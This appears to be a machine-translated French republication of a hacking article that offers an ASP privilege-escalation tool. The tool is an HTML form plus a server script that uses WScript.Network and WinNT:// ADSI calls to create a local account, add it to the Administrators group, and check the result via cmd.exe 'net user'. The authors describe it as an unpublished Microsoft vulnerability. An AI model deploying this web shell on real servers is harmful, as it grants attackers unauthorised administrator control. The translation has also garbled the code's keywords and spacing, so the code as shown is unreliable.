Ajout du code .asp de Super User [Blue Screen Original, Kevin Improvement, MS Vulnérabilité non publiée

Ajout du code .asp de Super User [Original of Blue Screen, Kevin Improvement, MS Vulnérabilité non publiée]

Auteur: Blue Screen, Article de Kevin Source: Felling Point Extreme

En fait, Kevin et moi l'avons testé sur mon chair la semaine dernière et Hippo Epic. Le résultat a été que les utilisateurs du groupe des administrateurs ont été ajoutés avec succès sous les autorisations des utilisateurs (bien que je ne puisse pas croire mes yeux).

La dernière fois que Kevin n'a rien dit, je n'ai pas osé le publier ... maintenant je l'ai vu le publier sur son blog, alors je l'ai transféré (c'était un peu mieux que lorsque je l'ai testé la dernière fois, et j'ai ajouté un formulaire). Maintenant, j'ai de la chance pour tout le monde `` '

Quoi qu'il en soit, le code est correct, mais il réussit rarement, cela dépend de la chance. . Haha, la prochaine étape, je veux l'intégrer dans l'océan. Hey-hey.

La copie de code est la suivante:

<A-Head> .NETWORK OBJET SCRIPTION Autorisation Amélioration de l'amélioration Exploit Tool </A-Head>

<formAction = "userAdd.asp" méthode = post>

Utilisateur: <inputName = "username" type = "text" value = "kevin1986"> <br>

Mot de passe: <inputName = "passwd" type = "mot de passe"> <br>

<portType = "soumi" value = "add">

</ form>

<% @ codepage = 936

onerrorresumenext

ifRequest.ServerVariables ("Remote_addr") <> "127.0.0.1" puis

Response.Write "IP! Sn0tright"

autre

ifrequest ("nom d'utilisateur") <> "" alors

username = request ("nom d'utilisateur")

passwd = request ("passwd")

Response.expires = 0

Session.Timeout = 50

Server.scriptTimeout = 3000

setlp = server.createObject ("wscript.network")

oz = "winnt: //" & lp .puthername

SetOB = getObject (oz)

Setoe = getObject (oz & "/ administrateurs, groupe")

Setod = ob.create ("utilisateur", nom d'utilisateur)

od.setpasswordpasswd

od.setinfo

oe.addoz & "/" & nom d'utilisateur

idierrhen

Response.Write "Hey ~~ vous ne devriez pas acheter 6 + 1 aujourd'hui ... il vaut mieux économiser 2 yuans pour acheter une bouteille de coke ..."

autre

iFinstr (server.createObject ("wscript.shell"). exec ("cmd.exe / cnetuser" & username.stdout.readall), "Last Login")> 0THEN

Response.Write "Bien qu'il n'y ait pas d'erreur, il semble qu'il n'a pas été établi avec succès. Vous devez être très déprimé."

autre

Response.write "OMG!" & Username & "Compte est devenu en fait! Ceci est une échappatoire inconnue. 5 000 000 RMB vous appartient."

endire

endire

autre

Response.Write "Veuillez saisir le nom d'utilisateur"

endire

endire

%>

Articles qui peuvent vous intéresser:

Rejeter le système de gestion d'hôtes virtuel extra-star, super utilisateur freehoStrunat Remote Desktop, améliorer le système de sécurité, diverses méthodes d'addition de super utilisateur cachées, récupérer le mot de passe super utilisateur de Redhat Linux 7.2, méthode d'ajout de super utilisateur aux utilisateurs ordinaires.